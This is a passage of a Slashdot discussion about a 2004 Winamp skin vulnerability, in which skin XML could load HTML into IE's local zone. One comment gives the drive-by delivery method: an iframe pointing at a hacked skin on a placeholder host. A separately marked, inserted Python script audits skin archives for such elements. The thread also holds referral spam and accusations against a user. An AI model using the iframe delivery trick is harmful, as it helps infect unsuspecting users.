    "so I may not understand the deeply compelling reasons driving such a design decision."

    *raises hand*

    Because since the late 90s EVERY PROGRAM must use the internet in some way. Useful or not. Anyone else notice this trend?

  58. back to media player.. by nurb432 · · Score: 2, Interesting

    "Good ole microsoft has this thing called media player that plays my mp3's..."

    "Can't trust those evil 3rd party hacker programs... That's what they say they wouldn't lie.. See this just proves it.."

    Not that Microsoft would be *that* evil to release exploits for 3rd party apps.... but it's an idea..

    --
    ---- Booth was a patriot ----
    1. Re:back to media player.. by botsmaster25 · · Score: 1

      Ahhhhhhhhhh.........Linux FUD.

      Yes. MS would do it because they are so evil. Does Winamp even run on Linux?

      If not, why would MS attack a Windows app?

    2. Re:back to media player.. by Anonymous Coward · · Score: 0

      Netscape was a Windows app, too, and they made killing that priority #1...

  59. Winamp's or IE's fault? by CodeMaster · · Score: 3, Interesting

    Still trying to figure out - is it winamp's fault that an XML character escape sequence causes stupid IE to run as in a local zone?

    This isn't the first app that gets nailed just because it was using IE (for whatever extent of use - full rendering or peripheral stuff like SSL Certificate handling or XML processing).

    Just add this to the IE screwups tally :-)

    get a free iPod![This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier :-(]

    1. Re:Winamp's or IE's fault? by TrancePhreak · · Score: 1

      Since Nullsoft is adding a patch for this in a future version, I would say it's their fault and not IE's.

      --

      -]Phreak Out[-
    2. Re:Winamp's or IE's fault? by Anonymous Coward · · Score: 0

      Apparently it works in firefox too, so it is not so much a problem with IE as it is Winamp.

    3. Re:Winamp's or IE's fault? by CodeMaster · · Score: 1

      Not exactly.

      And for the "it works in Firefox also" comments - well, it doesn't. Not exactly... Firefox will allow you to save the file, but when you open it, it will open using winamp, which uses IE for the XML handling - thus opening itself for the exploit.

      Nullsoft's patch will probably address the appropriate zone permissions its XML files are "executed" in, within IE, or just not use IE's engine for the XML stuff.

      get a free iPod! [This really works! - I have only 3 more referrals to go, my buddy already got his iPod (I should have gotten into this earlier :-(]

    4. Re:Winamp's or IE's fault? by nezroy · · Score: 1

      Uh, just because WinAmp is nice enough to put out a patch that will protect you from IE's vulnerable behavior does not mean it's their fault in the first place. Kinda like the whole Mozilla thing.

    5. Re:Winamp's or IE's fault? by Keeper · · Score: 1

      The zone content opens in is configured by the application hosting the browser control. IE is doing exactly what winamp stupidly told it to do -- open the content in the local zone.

  60. Another super-great use of XML... by Anonymous Coward · · Score: 0

    There is no earthly reason why a skin should be XML, other than to say "we have XML support". Just another misuse of XML.

    Add it to the ever expanding list.

  61. I call 1-800-INFINITELOOP by Anonymous Coward · · Score: 0

    Nope. Real is much better behaved than quicktime/Ipod.

    You're talking ancient history maybe.

    Furthermore, Real has always been a good citizen on Linux. While microsoft and apple refused to support Linux, Real did support Linux.

    Real may have behaved badly at one point on Windows, but Ipod is behaving badly now.

  62. 0day exploit in the wild by Jinsengo · · Score: 1

    seems that this flaw was reported by the French website security company K-Otik (http://www.k-otik.com) who made this private exploit code go "public"

  63. OT: Great flensing pic by cuzality · · Score: 0, Offtopic

    There's a great pic under "Whaling" over at Wikipedia -- sadly, no entry for "flensing".

    ....
    Fav new Firefox extensions: User Agent Switcher

  64. i'm famous! by DaWolfey · · Score: 3, Interesting

    I've never been linked to (well, indirectly) on slashdot before - it's my 30 seconds of fame!

    Just to add to the original thread a little, I only saw the worm spreading on IRC and I only saw 2 people who were spamming the link - like all mirc worms the infected person doesn't know they are doing it until someone tells them.

    I guess it's not got very far - since I reported the exploit I've not seen another spammed link for it.

  65. All Versions? by Gates82 · · Score: 1, Informative

    I still use winamp 1.90, I highly doubt that it will be affected. Besides what's a skine?!

  66. Re:Are you from a swing state? by LilMikey · · Score: 1

    Screw that... If it's a diebold a slightly creative person could get who everyone voted for and change them right there on the spot.

    Integration of Access in a Diebold machine is a much more serious offense than integration of IE in a WinAMP.

    --
    LilMikey.com... I'll stop doing it when you sto
  67. Bad eye candy by EmbeddedJanitor · · Score: 1
    It used to be that eye candy was just cute stuff that did no harm (beyond eating some extra CPU and RAM). Now we see that eye candy can be used to do bad things too.

    While the finger currently points at WinAmp skins, I guess all eye candy with XML etc could potentially be used to do the same thing.

    --
    Engineering is the art of compromise.
    1. Re:Bad eye candy by Anonymous Coward · · Score: 0

      Yes 'you' 'guess'... In other words you are stupid. You don't know anything about the topic, but you make stupid guesses. Thanks!

  68. The RIAA press release.... by endersdouble · · Score: 3, Funny

    Not only does evil P2P software break the law, it helps infect your computer! A program called Winamp, used by illegal copyright infringers to play their music files called MP3s, has a security hole allowing evil hackers to enter your system! We need to band together to ban this evil and dangerous Winamp program. Remember, no matter what, it is WRONG to use Winamp to play downloaded MP3s--and now, it is dangerous. Respect copyrights; uninstall Winamp.

  69. Old Version by Anonymous Coward · · Score: 0

    I recommend Winamp 2.95 (for all the flavor of Internet TV and Radio without all the bloat).

    OldVersion.com (wonderful for pre-bloat Acrobat Reader >=v5.0 et al.) has a great selection of Winamp flavors for all those who want a faster (and more secure) version.

    Enjoy.

  70. Is calculator safe? by rs79 · · Score: 5, Funny

    In related news, our editors today learned of the calc_virus; remote exploitation of Windows Calculator utility is possible and attackers can gain access to your machine via this program. The announcement that MS recommends you use an abacus was heralded as a remarkable advance in system security

    --
    Need Mercedes parts ?
  71. I think I speak for a lot of people when I say... by rd_syringe · · Score: 3, Insightful

    ...pointless skins for media players can go to hell. Foobar 2000 forever!

  72. iTunes you bastard! by revscat · · Score: 0, Flamebait
    No! Thou shalt worship no other gods but iTunes! All other MP3 players shall be banished to the topmost rung of RedMound for your heresy! BACK! BACK, I SAY!

    Cthulhu n'garn N'gah K'thuun pinkybrain!

    1. Re:iTunes you bastard! by Anonymous Coward · · Score: 0

      you apple zealots really need to get your heads checked.

  73. HOW QUAINT by Anonymous Coward · · Score: 0

    Another IE exploit.

    You know, one of these days, someone's going to have to develop a real anti-virus for Linux. And Unix. And BSD.

    And a defragger...

  74. Even more fun... by jejones · · Score: 3, Insightful

    The last time I tried it, WinAmp wouldn't work for me unless I had administrator privileges--so this exploit can do maximal damage. Maybe this will move a rewrite to work reasonably in a multi-user environment up on their priority list? (We can hope...)

  75. Re:School must've just gotten out. by ranolen · · Score: 1

    Speaking of low IQ, school is still out for the summer in most parts.

  76. The exploit: by Agilo · · Score: 1

    The exploit was posted on SecuriTeam: http://www.securiteam.com/exploits/5TP0Q1PDPM.html

    --
    - Agilo
    1. Re:The exploit: by gui_tarzan2000 · · Score: 2, Interesting
      Speaking of exploits...

      When did this become a common problem? When I used to program way back in the late 80's software code was simple and clean. We didn't really have issues like this to worry about. The occasional virus, but those were actually .com or .exe programs. I know the Internet wasn't in place for the public yet, but still. And I know about the Unix worm. But isn't the main reason this is happening because coding has gotten either that sloppy or that disorganized?

      As much as I hate Microsoft, I don't blame them for things like this although they have not set a good example. There are thousands of programmers to blame for sloppy code, bloat and security issues so we can spread it around a bit.

      --
      Have you hugged your penguin today?
  77. Foo! by ralphus · · Score: 4, Insightful

    Why are you geeks worried? Shouldn't you be using Foobar2000 anyway? It is about 2000 X better than winamp and packed with geek friendly features.

    --
    Revolutions are never about freedom or justice. They're about who's going to be top dog. -- Kilgore Trout
    1. Re:Foo! by Anonymous Coward · · Score: 0

      yes. an application designed to play music, without a ui widget to adjust the volume. GENIUS.

    2. Re:Foo! by Anonymous Coward · · Score: 0

      Most users have a little "speaker" icon in their systray. Use that. See, volume widget redundant.

    3. Re:Foo! by r00k123 · · Score: 1

      Packed with...nuh uh. Open Winamp with a full playlist. Press J. Type something. MUCH slicker than Foobar's attempt at the same feature. "Jump" alone keeps me on winamp..

  78. skin by damned_in_davis · · Score: 1

    nothing that a thin film of miconazole nitrate on the monitor can't fix in 2-3 weeks...


    --


    "why you tattoring fan sucked doo belly - i have to go buy something to strike you with... excuse me."
  79. say it out loud... by Anonymous Coward · · Score: 3, Insightful

    ...it's another WINDOWS problem. The OS and any apps for it are "run at your own peril". That includes mozilla stuff. It's because it's designed to run on WINDOWS.

    WINDOWS
    WINDOWS
    WINDOWS

    I don't care how leet folks think they are, as long as people run windows stuff, develop for windows, run windows apps, think about windows, they are gonna get hosed, sooner or later.

    You would think after 10 years of this stuff that it would be noticed, nope, folks still think just one more patch or one more version higher of their windows apps or OS is gonna magically fix windows.

    Charlie Brown

    Lucy

    Lucy holding football

    Charlie Brown on his butt looking lame

    Charlie Brown = windows

    Lucy = windows apps

    Lucy holding football = thinking just this one more time, that this is the time she will hold it correctly, that just this time it will work and be "secure"

    Charlie Brown on his butt for the 9,863rd time = windows users, never learn, always going to think if they hold out one more time it will be OK.

    1. Re:say it out loud... by arminw · · Score: 2, Interesting

      Is there NO way to tell *any* flavor of Windows to allow any or all programs to write to the user directories only, by limiting the privileges of a user? In Linux and the Mac it is possible to disallow a user or any program he may run from touching anything that might affect the system. Therefore, if a user is dumb enough to run unknown programs, only his/her stuff gets deservedly hosed.

      --
      All theory is gray
    2. Re:say it out loud... by Anonymous Coward · · Score: 1, Interesting

      Is there NO way to tell *any* flavor of Windows to allow any or all programs to write to the user directories only, by limiting the privileges of a user?

      Of course there is, in fact with greater granularity than Unix permissions allow. The problem is, if you blanket deny write access to anything but the user's directories, many programs break.

      Too much stuff is written by programmers who think that writing to the application directory is ok. It's easy enough to enable write permission to individual files to get around this (and registry keys in some cases), but doing it for about half of the installed programs gets old really quick. And that's after you determine which files/keys they need write permission to.

      So if you're not a Windows expert and don't have one around, practically speaking it's impossible.

    3. Re:say it out loud... by mpe · · Score: 1

      Is there NO way to tell *any* flavor of Windows to allow any or all programs to write to the user directories only, by limiting the privileges of a user? In Linux and the Mac it is possible to disallow a user or any program he may run from touching anything that might affect the system.

      The problem is that many Windows apps (n.b. not just old applications) are written using a "personal computer" design which assumes that the person sat in front of the computer can alter anything.

    4. Re:say it out loud... by mpe · · Score: 1

      Too much stuff is written by programmers who think that writing to the application directory is ok. It's easy enough to enable write permission to individual files to get around this (and registry keys in some cases), but doing it for about half of the installed programs gets old really quick. And that's after you determine which files/keys they need write permission to.

      Don't expect much help from the program supplier though...

    5. Re:say it out loud... by arminw · · Score: 1

      Thanks for the insight...

      It seems that until MS can change these practices by program writers there is no real hope of them *ever* coming up with a secure system.

      However, meanwhile, it seems that MS or someone could write a utility that would deny all permissions to any and all system related things and then make it easy for the user to give permissions to selected programs only -- one at a time as they were run the first time.

      It means that MS users will have to bite the bullet and do a little more work initially and maybe replace some of their software. If such a system were in place, any malware that a user may download could not run surreptitiously, but would have to ask for permissions first. A user could be warned not to approve if he/she is not sure of the source of the file that is asking for permission.

      Security and convenience, even in the real world, are at odds and this extra work, it seems to me, most users would not mind if it prevents their systems from being messed up against their will or knowledge. If they DO give permissions to questionable code, then they deserve to have their systems hosed.

      --
      All theory is gray
  80. It isn't just the skin... by poohsuntzu · · Score: 3, Informative

    It's how it is delivered. The simplest way involves:

    iframe src="http://www.blah.com/winamphackedskin.wsz"

    That right there, in any browser, will initiate a download of the winamp skin file. In Opera/Firefox/Mozilla you are given a download confirmation prompt. However, if IE is your default browser then IE will auto download and install the winamp skin without your knowledge.. or at least until your winamp pops up suddenly with a new skin. We can't tell people to "don't download skins" merely because it's far more serious than that. Manual skin changing or not, that iframe trick is going to nail a lot of people.

    The best bet would be to ignore winamp completely until a patch can be provided, or have Firefox set as your default browser.

    --
    "We're breaking out the ramen noodles. . . "
    "Really? Is it someone's birthday?"
  81. LoL by Anonymous Coward · · Score: 0

    Who the hell cares, I use XMMS like a real man. I hope all you microcrap windows users get viruses from your ad based spyware programs.

  82. Re:Foo? by Ozwald · · Score: 1

    Slashdot geeks using Windows. Hmph. I would have expected mpg123/mixerctl. Oh well. Whatever works.

    Oz

  83. I'm surprised no one's plugged quinnware by Zancarius · · Score: 1

    In spite of all the shameless plugs for various assorted flavors of media players, I haven't seen one plug Quinnware yet. More specifically, their Quintessential Player. Sure the default interface might not be as "nice" as Winamp, but if you're using that OS from Redmond, WA, you get a player that also includes CD ripping/mp3 encoding.

    Apologies ahead of time for the shameless plug, but I figured it's only fair to list alternatives in addition to the ones already provided!

    --
    He who has no .plan has small finger. ~ Confucius on UNIX
  84. Suggestion to Windows yet NON-IE users by Spuffin · · Score: 3, Interesting

    Use Work Offline mode in IE when you aren't using it. This setting will be saved even when you close IE thus keeping IE exploits such as this down. As a side note, it also kills the ads in AIM which is a nice plus. The only downside is when a program does try to access the internet using IE (such as AIM) it prompts you to Stay Offline or Connect. All you have to do is click stay offline and you'll be fine. If anyone knows how to suppress this prompt I would love to hear it.

  85. Re:Foo? by ralphus · · Score: 1
    Foobar2000 is the only reason I keep a Win32 machine going at home. It has a kicking sound card and digital interconnect to my amp. Of course it is getting all its music from FLAC files stored on a RH9 server running Samba.

    No other audio player can touch Foobar2000 in terms of quality or flexibility.

    --
    Revolutions are never about freedom or justice. They're about who's going to be top dog. -- Kilgore Trout
  86. Further evidence that [the internet] is stupid by Anonymous Coward · · Score: 0

    "Seems to me I was just bitching about skinning [slashdot.org] and mentioned that security holes were one possible (but unlikely) down-side. I love when the universe makes my point for me."

    If security holes are proof that skinning's stupid? Then likewise browsing the Internet is stupid. OK, everyone shut 'em down. Let's all head home. It's not safe out there.

  87. RTFA (not an Internet Explorer bug) by KJKHyperion · · Score: 1
    An XML document in the Winamp skin zip file can reference an HTML document using the "browser" tag and get it to run in the "Local computer zone"

    Do you see the problem here? Winamp embeds the whole Internet Explorer application, not just the HTML rendering control. That's rarely a good idea, since you effectively lose control over your own application - for example, Winamp is "restricted" by the Internet Explorer policies based on zones, instead of disabling active content period.

    --

    Make a difference - use Windows! (open source clone of Windows NT)

  88. ...it makes me wonder... by Zx-man · · Score: 0

    ...when the best open-source *nix audio players (mpg321 & ogg123, of course) will get their skinning enabled?

    P.S. By the way, I might suggest that you, the ones still using WinAMP, start migrating to the more compact (both on the HDD & in RAM), free (as in ``free beer''), almost-equally-featured (except for the auto-execution of the skinning scripts, emphatically...) and, what really matters, not as baroque, state-of-the-art universal audio players for the win32 & compatibles (and, by using WINE, under the GNU/Linux too), - ``XMPlay'', see http://www.un4seen.com || Alternately, use the open-source, quite rich featured and cross-platform ``Zinf'' (ex-FreeA*p) - http://zinf.org

    P.P.S. Or, quite a way better, stop listening to digitized music at all, mha-ha-ha! ;-)

  89. Skinned, Kremed, and Creamated... by davidsyes · · Score: 1

    I CANNOT help this...

    All in one day...

    1. WinAmp is being skinned alive

    2. Cremators settle for $80M suit

    3. Krispy Kreme profits fall by 1/2

    1. is at (redundantly) http://slashdot.org/articles/04/08/26/1919249.shtml?tid=172&tid=1&tid=218

    2. http://story.news.yahoo.com/news?tmpl=story&cid=519&ncid=519&e=2&u=/ap/20040826/ap_on_re_us/crematory_lawsuit_8

    and

    3. http://news.yahoo.com/news?tmpl=story&u=/nm/20040826/bs_nm/leisure_krispykreme_earns_dc_9

    Talk about skinning, slashing and burning...

    DOH!

    David Syes

    --
    Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
    1. Re:Skinned, Kremed, and Creamated... by davidsyes · · Score: 1

      Oh,

      On top of that, the Crematory and Krispy Kreme articles were adjacent to each other on the Yahoo! page.

      As for the Romans and their crematory, they'll have to "burn through a lot of cash" to make a profit/return to profitability. They're REALLy going to have to BURN their way back to profits, if the courts or the state don't fry them alive.

      As for Krispy Kreme being CREAMED, I can't fathom how a business or an industry expects to increase Q over Q profits with a basically unhealthy business model -- one that idealistically presumes people will be RESPONSIBLE for their own health but factually depends on people eating their way into a grave or a heart operation (and as a nation we pick up the tab for each and every piece of junk putting some obese or morbidly obese American or insured visitor on the procedure table or the post-mortem gurney). It's only inevitable and logical that the more educated people become the more they should cut back on JUNK or compensate by drinking more water, exercising more, and watching their sugars, salt, calories, and other levels. (About two weeks ago, I ate a KK donut and my teeth and gums hurt like hell for a few minutes. I don't recall that from other donuts, but Snickers and 3 Musketeers and some but not all candy bars give the same sensation of having needles run thru my teeth or gums. Quite unpleasant. I better see my dentist...)

      --
      Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
  90. Futile by Anonymous Coward · · Score: 0

    I live in a swing state (not one you mentioned). But Kerry should be leading in this state by 40 points, not the 3 he's currently leading by. He's screwed.

    You might as well just vote for Michael Badnarik.

  91. Let me take this opportunity to say... by fm6 · · Score: 1
    I hate skinnable software. It's less reliable and harder to use than software that just follows standard L&F APIs and conventions. My particular unfavorite is PowerDVD, which I'm forced to use because it's the only software I have that groks my DVD drive. It would have been so easy for them to just provide a simple menu and/or toolbar at the top of the display window, with standard, self-explanatory controls. But no, that wouldn't be cool. So instead I have to poke at mysterious icons and an unusable progress bar on a separate control window that doesn't even coordinate its Z-level with the display window! Argh!

    If anybody wants to recommend their favorite open-source Windows or Linux DVD player, feel free. But if it's skinnable, I'm not interested!

  92. WFM... by Apathetic1 · · Score: 1

    WinAmp 2.91 works for me under Windows 2000 with User privileges. I haven't tried WinAmp 5 because I hated WinAmp 3 so much...

    --

    My username does not make me Apathetic. It's irony, get it?

  93. duh by Anonymous Coward · · Score: 0

    Who lets winamp pass through their firewall anyway? That's like hooking up with a homeless woman without a condom.

    Sorry Gary, I love you buddy, but when you hooked up with that homeless woman, I realized how suicidal you really were. Oh ya, and you made out with my ex-wife too! LOL! You so crayZEEE!

    Security 101: Don't let any process have access to the internet unless you absolutely need it. Having Winamp look up the titles of your ill gotten mp3 files does not sound like a sound security strategy to this sap!

    But then again, I was the one that married Janelle!

  94. Re:Foo? by Anonymous Coward · · Score: 0

    It's for the subset of slashdot geeks that think having a player that handles 48-bit audio makes a difference. (Nevermind that most of their music is 128kbps mp3s downloaded from kazaa, and they have a cheap commodity soundcard and speakers) To them, FooBar2000 just sounds better, and it's useless to try and debate it.

  95. Help, can't skin MP3 Player! by eyepeepackets · · Score: 1

    I looked and looked but there are no skins for my mp3 player. Is it lame or what? Am I just another maroon (thanks Bugs) who happens to be skinless?

    Player: cmp3
    Where: freshmeat.net

    Any help with this skin problem is way too much! :)

    --
    Everything in the Universe sucks: It's the law!
  96. java apache httpd == tomcat (standalone) by Ayanami+Rei · · Score: 1
    --
    THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
  97. panic in the streets!! by bruddah · · Score: 1

    My sysadmin commanded all his minions to uninstall WinAmp "immediately"!! He reckons that "Since the software manufacturer has yet to issue a patch, the only workaround at this point is to uninstall the software"

    Get a grip dude. The problem is only applicable if you
    * habitually download 100's of winamp skins
    * get dodgy software off IRC
    * allow automatic switching of skins in your winamp Preferences

    This scaremongering is a capitalist ploy hatched by the corporations, RIAA, BSA, and the Illuminati, to force you to use the festering pile of crud called 'Windows Media Player'..

    One good thing is that I have discovered the joy of foobar2000 instead :o)

  98. I think *I* speak for a lot of people when I say.. by Anonymous Coward · · Score: 0

    Don't be taken in by this idiot--he has accounts under the names bonch and Overly Critical Guy. He has a history of astroturfing for Microsoft, bashing anything Open Source, using lies and half-truths to get modded up, karma whoring, and the usual trolling (under his bonch account, he got a troll posted to the front page of Slashdot).

    All you have to do to check the veracity of this is to look at the posting history of his two old personae (linked above) and his current one to figure it out.

    Please do not mod this jerk up--every time you do the Slashdot S/N ratio goes down while bonch/Overly Critical Guy/rd_syringe just laughs at you.

    This has been a public service announcement

  99. you forgot.. by ashot · · Score: 1

    if you aren't a moron you are also NOT affected.

    --
    -ashot
  100. Yes, there is a way to get windows without IE by Anonymous Coward · · Score: 0

    Predictably, you've already gotten an 'authoritative' no answer. That poster is wrong. There is a way. I use it, and it's great. LitePC makes 98Lite (for DOS based Windows versions 95, 98, 98SE, ME) and XPLite (NT based Windows 2000 and XP.) It's a WONDERFUL thing if you have to use Windows.

  101. Easy answer by Anonymous Coward · · Score: 0

    Back in the old days, there was no need for security because nobody but you had access to the machine anyways. It's incredible to think of how floppy-viruses propagated compared to the Internet today. But essentially, there were no "hackers" that could take you down via the phone-line. Back in those days, that was considered a joke on the ignorant.

    The more convenience and interconnectivity you offer, the more security you need to implement at all those gates and pathways of code.

    The reasons for so many security holes are twofold:

    1) Ignorance concerning security among programmers. Implementing features without making security-layer AT THE FOUNDATION. Adding security after the first designs, always fails horribly. Security and convenience seem always to be at odds with each other, so security gets lower priority.

    2) True and tested methods of programming are not so secure. Using programming-languages / libraries with no checks and balances of possible overruns is Bad. It's like inviting hackers to break your code. If everyone used Java or some compiled language with protection, most exploits would dissipate.

    Obvious: Advancing hacking expertise among white/black-hats. Somebody is always eager to learn new ways to break others' efforts. The methods are in many ways the same (stack overflows, mangled input, etc), but with encryption and authentication protocols, there are always new challenges even if the methods stay relatively the same.

    The next step in security is to build everything with stack-overflow protection. As is done in Open BSD and a few hardened Linux distributions. There is really no reason why overruns shouldn't be prevented as much as possible. Using insecure methodologies, new code will always pose a higher risk.

    The simplest answer is:

    Security is just not as sexy as Features.
    Features are really, really sexy, and people pay money for Features. (She's hot!)

    So I believe programmers aren't necessarily more sloppy these days, it's just that the consciousness for security is lacking because Features have enthralled everybody's mind!

  102. When will software companies and developers learn? by inkswamp · · Score: 2, Insightful
    Does it take a freakin' rocket scientist to figure out that any time your software does something automatically, especially if it's something dealing with the network/Internet, you should think very carefully about how necessary the feature is? That is, consider whether it should even be there at all. It seems that a lot of security issues could be stopped if developers and software companies would just let the user decide when and (most importantly) if at all a piece of software does something automatically. At the very least, there should be a way to turn the feature off and the developer should ship with the feature disabled by default.

    --
    --Rick "If it isn't broken, take it apart and find out why."
  103. Flensing? by Pan+T.+Hose · · Score: 1

    Can I name the worm?? I propose "flensing."

    Having read Winamp's EULA, I believe "circumcision" would be much more appropriate.

    --
    Sincerely,
    Pan Tarhei Hosé, PhD.
    "Homo sum et cogito ergo odi profanum vulgus et libido."
  104. Re:Foo? by Anonymous Coward · · Score: 0

    Oh, so that's what "geek friendly" meant? "Gives you an excuse to keep an extra PC on your desk".

  105. Maybe, but XP breaks NotePad... by ebonkyre · · Score: 1

    No, seriously.

    NotePad in XP has major bugs not present in earlier versions, such as when you save a file, the current Word Wrap margins become actual line breaks. The saved file is fine but the open document now has hard CR/LFs in it, so if you save it a second time without closing and reopening the file, the file is corrupted.

    --
    "Time is an abstract concept devised by carbon-based lifeforms to monitor their ongoing decay." - Thundercleese
  106. Wait..... by Anonymous Coward · · Score: 0

    I think that the issue may not totally be Nullsoft's fault as they are just using the IE engine for the browser function in Winamp. Let's point the fingers at who friggin broke the damn browser years ago.

  107. Re:I think *I* speak for a lot of people when I sa by Anonymous Coward · · Score: 0

    someone astroturfing for microsoft and bashing open source is posting about how media player skins are bad and linking to an open source media player?

  108. Re:Foo? by ralphus · · Score: 1

    no, I keep my music/video PC where it belongs, in my AV rack.

    --
    Revolutions are never about freedom or justice. They're about who's going to be top dog. -- Kilgore Trout
  109. Re:yet another way... Data vs. code by McFly777 · · Score: 1
    It's a major security problem when people download untrusted winamp skins on IRC.
    The issue that I have with this is the lack of separation between data and code. I know that "skins" can be more than just a bitmap that gets applied to the window background, but why do they need to be? To begin with I don't see the need for the skin for an application to be able to execute code. Keep the data in the skin limited to a few bitmaps, tagged as to what they should be applied to.

    I guess I am thinking like 'mod' files for the original Doom series (haven't messed with quake or later...), sure you could instruct it to place the walls in goofy places, and make them look different, but you couldn't give your character the ability to fly, etc. because you weren't writing code to be executed; you were only supplying data that the existing code would reference.

    I reserve the right to be stupid about this, but it seems so simple.... so I might be missing something.

    --

    McFly777
    - - -
    "What do people mean when they say the computer went down on them?" -Marilyn Pittman
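Added example, not part of any comment in this thread and not Nullsoft's code: a Python audit of a skin archive that flags the XML "browser" element described in comment 87 and enforces the data-only idea from comment 109. The extension lists, the size cap, and the element and attribute names in the constructed sample are assumptions, not taken from Winamp's skin format.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Assumptions (not from Winamp documentation): which member types count as plain
# data, which count as active content, and a size cap for XML we are willing to parse.
DATA_ONLY = {".bmp", ".png", ".cur", ".txt", ".ini"}
ACTIVE = {".htm", ".html", ".js", ".vbs", ".hta", ".exe", ".dll"}
MAX_XML_BYTES = 1 << 20


def audit_xml(name, raw):
    """Flag every <browser> element in one XML member."""
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", raw, re.IGNORECASE):
        # Refuse to parse DTDs: entity expansion is a parser-level risk of its own.
        return [("reject", name, "DTD or entity declaration in skin XML")]
    try:
        root = ET.fromstring(raw)
    except ET.ParseError:
        hit = re.search(rb"<\s*browser\b", raw, re.IGNORECASE)
        reason = "browser element in malformed XML" if hit else "XML does not parse"
        return [("reject" if hit else "review", name, reason)]
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1].lower()  # drop any namespace prefix
        if tag == "browser":
            attrs = " ".join(f'{k}="{v}"' for k, v in sorted(elem.attrib.items()))
            findings.append(("reject", name, f"browser element: {attrs}"))
    return findings


def audit_skin(data):
    """Return (severity, member, reason) findings for a skin archive held in bytes."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("reject", "<archive>", "not a valid zip container")]
    findings = []
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            name = info.filename
            dot = name.rfind(".")
            ext = name[dot:].lower() if dot != -1 else ""
            if ext in ACTIVE:
                findings.append(("reject", name, "active content inside skin"))
            elif ext == ".xml":
                if info.file_size > MAX_XML_BYTES:
                    findings.append(("review", name, "XML member too large to inspect"))
                else:
                    findings.extend(audit_xml(name, archive.read(info)))
            elif ext not in DATA_ONLY:
                findings.append(("review", name, "member type outside the data-only allowlist"))
    return findings


def build_sample(with_browser):
    """Constructed sample archive; element and attribute names are illustrative only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("main.bmp", b"BM constructed placeholder")
        if with_browser:
            z.writestr("skin.xml", '<skin><browser src="page.html"/></skin>')
            z.writestr("page.html", "<html><body>constructed</body></html>")
        else:
            z.writestr("skin.xml", '<skin><bitmap file="main.bmp"/></skin>')
    return buf.getvalue()


if __name__ == "__main__":
    for severity, member, reason in audit_skin(build_sample(with_browser=True)):
        print(f"{severity:7} {member:10} {reason}")
```

A gateway or download handler could call `audit_skin` on the archive bytes and refuse to hand the file to the player when any finding has severity "reject".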
  110. Winamp 5.05 posted....fixes exploit by Anonymous Coward · · Score: 0

    Nullsoft has updated their website with Winamp 5.05. This build fixes the security exploit that was reported. good times.